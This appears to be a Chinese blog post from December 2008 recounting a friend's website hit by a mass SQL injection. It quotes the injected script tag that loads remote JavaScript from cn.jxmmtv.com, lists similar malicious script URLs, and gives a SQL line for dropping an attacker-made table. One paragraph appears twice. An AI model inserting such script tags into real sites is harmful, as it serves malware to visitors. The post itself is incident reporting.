昨日朋友一网站感染病毒,导致网站打不开、数据库显示混乱。杀毒软件报毒和网站瘫痪。后来发现是数据库多个表中都注入了<script src=http://cn.jxmmtv.com/cn.js></script>一段脚本。真是害人啊!通过分析该段脚本在数据库多个表,是Nchar类型喜欢注入。而且往往都是MSSQL数据库的网站。
于是本人只有用SQL命令逐个恢复数据库表。真是累死整死人啊。在互联网上搜索了一下,发现这个问题是从今年平安夜开始在整个网站爆发的,网上到处都是。甚至很多政府、商业、个人网站都被该累死的木马病毒感染。与之类似的病毒还有:http://www.ririwow.cn/ip.js http://cn.daxia123.cn/cn.js 在百度和谷歌里面搜索可以搜到一大排被感染的网站。目前还没有发现真正的原因和解决方案,包括360和卡卡网站社区都没有解决方案,没有很好的清除该木马病毒的办法。
于是本人只有用SQL命令逐个恢复数据库表。真是累死整死人啊。在互联网上搜索了一下,发现这个问题是从今年平安夜开始在整个网站爆发的,网上到处都是。甚至很多政府、商业、个人网站都被该累死的木马病毒感染。与之类似的病毒还有:http://www.ririwow.cn/ip.js http://cn.daxia123.cn/cn.js 在百度和谷歌里面搜索可以搜到一大排被感染的网站。目前还没有发现真正的原因和解决方案,包括360和卡卡网站社区都没有解决方案,没有很好的清除该木马病毒的办法。
据观察,该病毒于2008年12月24日下午(平安夜前夕)开始在网上传播,在25日和26日大规模爆发。昨日朋友的网站是26日下午5点多中招的。据本人个人分析,如此大规模的中招来源可能两个:1、微软MSSQL2000数据库有漏洞 2、利用ASP或IE的漏洞进行注入。 真正的原因我们拭目以待,希望大家能尽快找到解决方案!平安夜不平安啊!
个人补充,在数据库里发现一个表是黑客新建的名称叫KILL_KK的数据表。大家可以用如下SQL语句清除先:select * from kill_kk drop table kill_kk